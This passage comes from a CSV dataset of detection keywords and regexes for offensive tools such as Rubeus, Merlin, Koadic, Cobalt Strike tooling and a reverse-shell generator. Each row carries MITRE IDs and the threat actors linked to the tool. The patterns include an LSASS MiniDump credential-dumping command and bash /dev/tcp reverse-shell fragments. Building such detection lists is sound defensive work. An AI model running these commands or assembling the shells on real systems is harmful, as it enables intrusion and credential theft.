T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","57695" "*rundll32 *RunRubeus*",".{0,1000}rundll32\s.{0,1000}RunRubeus.{0,1000}","offensive_tool_keyword","Rubeus","Run Rubeus via Rundll32 (potential application whitelisting bypass technique)","T1558.004 - T1098 - T1110.001 - T1555.003 - T1218.011 - T1085 - T1070.004","TA0005 - TA0002 - TA0006 - TA0008 - TA0009","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/rvrsh3ll/Rubeus-Rundll32","1","0","N/A","N/A","10","3","200","32","2020-04-25T19:55:27Z","2020-04-24T20:35:38Z","57696" "*rundll32 charlotte.dll*",".{0,1000}rundll32\scharlotte\.dll.{0,1000}","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","0","N/A","N/A","10","10","976","211","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z","57697" "*rundll32 merlin.dll,Magic*",".{0,1000}rundll32\smerlin\.dll,Magic.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","57698" "*rundll32 merlin.dll,Merlin*",".{0,1000}rundll32\smerlin\.dll,Merlin.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - 
TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","57699" "*rundll32 merlin.dll,Run*",".{0,1000}rundll32\smerlin\.dll,Run.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","57700" "*rundll32.exe agressor.dll*dec*",".{0,1000}rundll32\.exe\sagressor\.dll.{0,1000}dec.{0,1000}","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products. Mortar Loader performs encryption and decryption of selected binary inside the memory streams and executes it directly without writing any malicious indicator into the hard-drive. 
Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","N/A","N/A","10","10","1451","235","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z","57705" "*rundll32.exe C:\Users\Public\*",".{0,1000}rundll32\.exe\sC\:\\Users\\Public\\.{0,1000}","offensive_tool_keyword","powershell","Defense evasion technique","T1218.011","TA0005","N/A","N/A","Defense Evasion","https://www.trendmicro.com/en_us/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","57706" "*rundll32.exe C:\windows\System32\comsvcs.dll MiniDump (Get-Process lsass).id*",".{0,1000}rundll32\.exe\sC\:\\windows\\System32\\comsvcs\.dll\sMiniDump\s\(Get\-Process\slsass\)\.id.{0,1000}","offensive_tool_keyword","powershell","credential dumping activity","T1003.001","TA0006","N/A","N/A","Collection","https://www.trendmicro.com/en_us/research/22/g/analyzing-penetration-testing-tools-that-threat-actors-use-to-br.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","57707" "*rundll32.exe* merlin.dll,Magic*",".{0,1000}rundll32\.exe.{0,1000}\smerlin\.dll,Magic.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","57708" "*rundll32.exe* merlin.dll,Merlin*",".{0,1000}rundll32\.exe.{0,1000}\smerlin\.dll,Merlin.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 
- TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","57709" "*rundll32.exe* merlin.dll,Run*",".{0,1000}rundll32\.exe.{0,1000}\smerlin\.dll,Run.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","57710" "*RunDLL32JSStager*",".{0,1000}RunDLL32JSStager.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","57711" "*Run-EXEonRemote*",".{0,1000}Run\-EXEonRemote.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","57712" "*Run-EXEonRemote.ps1*",".{0,1000}Run\-EXEonRemote\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","57713" "*RunExfil-78740706-9DEC-EC11-BB3D-0022482CA4A7.json*",".{0,1000}RunExfil\-78740706\-9DEC\-EC11\-BB3D\-0022482CA4A7\.json.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tool","https://github.com/mbrg/power-pwn","1","1","N/A","N/A","10","10","939","100","2025-03-20T08:54:43Z","2022-06-14T11:40:21Z","57714" "*runFakeTerminal*",".{0,1000}runFakeTerminal.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","1","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","57715" "*run-hiphp-tk.sh*",".{0,1000}run\-hiphp\-tk\.sh.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. 
It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","1","N/A","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","57716" "*Running elusiveMice 'BEACON_RDLL_GENERATE*",".{0,1000}Running\selusiveMice\s\'BEACON_RDLL_GENERATE.{0,1000}","offensive_tool_keyword","ElusiveMice","Cobalt Strike User-Defined Reflective Loader with AV/EDR Evasion in mind","T1620 - T1055.012 - T1202","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/mgeeky/ElusiveMice","1","0","#content","N/A","10","5","449","78","2023-07-12T17:54:07Z","2021-08-27T19:22:20Z","57717" "*Running final exploit packet*",".{0,1000}Running\sfinal\sexploit\spacket.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Exploit-EternalBlue.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","57718" "*Running final exploit packet*",".{0,1000}Running\sfinal\sexploit\spacket.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","57719" "*Running hijacking process*",".{0,1000}Running\shijacking\sprocess.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and 
stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","57720" "*Running lolMiner from *",".{0,1000}Running\slolMiner\sfrom\s.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","57721" "*Running password spray against %d users*",".{0,1000}Running\spassword\sspray\sagainst\s\%d\susers.{0,1000}","offensive_tool_keyword","o365spray","Username enumeration and password spraying tool aimed at Microsoft O365","T1110.003 - T1087.002","TA0007 - TA0006","N/A","N/A","Credential Access","https://github.com/0xZDH/o365spray","1","0","#content","N/A","8","9","846","100","2024-11-06T00:49:23Z","2019-08-07T14:47:45Z","57722" "*running SharpHound*",".{0,1000}running\sSharpHound.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","57723" "*Running the exploit be patient................................*",".{0,1000}Running\sthe\sexploit\sbe\spatient\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..{0,1000}","offensive_tool_keyword","POC","Exploit tool for CVE-2023-4911 targeting the 'Looney Tunables' glibc vulnerability 
in various Linux distributions.","T1068 - T1210 - T1555","TA0001 - TA0003 - TA0005","N/A","N/A","Exploitation tool","https://github.com/chaudharyarjun/LooneyPwner","1","0","#content #linux","N/A","10","1","38","12","2023-10-18T04:59:50Z","2023-10-17T07:44:16Z","57724" "*Running: netcat *",".{0,1000}Running\:\snetcat\s.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#content #linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","57725" "*RunOF.exe -*",".{0,1000}RunOF\.exe\s\-.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - 
REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nettitude/RunOF","1","0","N/A","N/A","10","10","145","21","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z","57726" "*RunOF.Internals*",".{0,1000}RunOF\.Internals.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/nettitude/RunOF","1","1","N/A","N/A","10","10","145","21","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z","57727" "*run-pilot -targetIP *",".{0,1000}run\-pilot\s\-targetIP\s.{0,1000}","offensive_tool_keyword","PILOT","Pilot is a simplified system designed for the stealthy transfer of files across networks using ICMP","T1048.001 - T1573.001 - T1020","TA0010 - TA0002 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/dahvidschloss/PILOT","1","0","N/A","N/A","9","1","79","7","2024-04-16T18:24:44Z","2024-04-03T15:04:33Z","57728" "*RunRansomware-76740706-9DEC-EC11-BB3D-0022482CA4A7.json*",".{0,1000}RunRansomware\-76740706\-9DEC\-EC11\-BB3D\-0022482CA4A7\.json.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tool","https://github.com/mbrg/power-pwn","1","1","N/A","N/A","10","10","939","100","2025-03-20T08:54:43Z","2022-06-14T11:40:21Z","57729" "*Runs a powershell command while attempting to bypass AMSI*",".{0,1000}Runs\sa\spowershell\scommand\swhile\sattempting\sto\sbypass\sAMSI.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","N/A","10","2","182","36","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z","57730" "*runShellcode*",".{0,1000}runShellcode.{0,1000}","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - 
T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","1","N/A","N/A","10","10","1109","180","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z","57733" "*runshellcode.asm*",".{0,1000}runshellcode\.asm.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","57734" "*runshellcode.exe*",".{0,1000}runshellcode\.exe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - 
BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","57735" "*runshellcode.o*",".{0,1000}runshellcode\.o.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","57736" "*RunStealCookie-8B5C57DA-F404-ED11-82E4-0022481BF843.json*",".{0,1000}RunStealCookie\-8B5C57DA\-F404\-ED11\-82E4\-0022481BF843\.json.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tool","https://github.com/mbrg/power-pwn","1","1","N/A","N/A","10","10","939","100","2025-03-20T08:54:43Z","2022-06-14T11:40:21Z","57737" "*RunStealPowerAutomateToken-8C5C57DA-F404-ED11-82E4-0022481BF843.json*",".{0,1000}RunStealPowerAutomateToken\-8C5C57DA\-F404\-ED11\-82E4\-0022481BF843\.json.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tool","https://github.com/mbrg/power-pwn","1","1","N/A","N/A","10","10","939","100","2025-03-20T08:54:43Z","2022-06-14T11:40:21Z","57738" "*Runtime.getRuntime().exec(""bash -c /dev/tcp/*/* 
/bin/bash""*",".{0,1000}Runtime\.getRuntime\(\)\.exec\(\""bash\s\-c\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s\/bin\/bash\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","57739" "*Runtime.getRuntime().exec(""bash -c /dev/tcp/*/* /bin/sh""*",".{0,1000}Runtime\.getRuntime\(\)\.exec\(\""bash\s\-c\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s\/bin\/sh\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","57740" "*Runtime.getRuntime().exec(""bash -c /dev/tcp/*/* bash""*",".{0,1000}Runtime\.getRuntime\(\)\.exec\(\""bash\s\-c\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\sbash\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","57741" "*Runtime.getRuntime().exec(""bash -c /dev/tcp/*/* cmd""*",".{0,1000}Runtime\.getRuntime\(\)\.exec\(\""bash\s\-c\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\scmd\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","57742" "*Runtime.getRuntime().exec(""bash -c /dev/tcp/*/* 
powershell""*",".{0,1000}Runtime\.getRuntime\(\)\.exec\(\""bash\s\-c\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\spowershell\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","57743" "*Runtime.getRuntime().exec(""bash -c /dev/tcp/*/* pwsh""*",".{0,1000}Runtime\.getRuntime\(\)\.exec\(\""bash\s\-c\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\spwsh\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","57744" "*Runtime.getRuntime().exec(""bash -c /dev/tcp/*/* zsh""*",".{0,1000}Runtime\.getRuntime\(\)\.exec\(\""bash\s\-c\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\szsh\"".{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","57745" "*Runtime.getRuntime().exec(""bash -c* 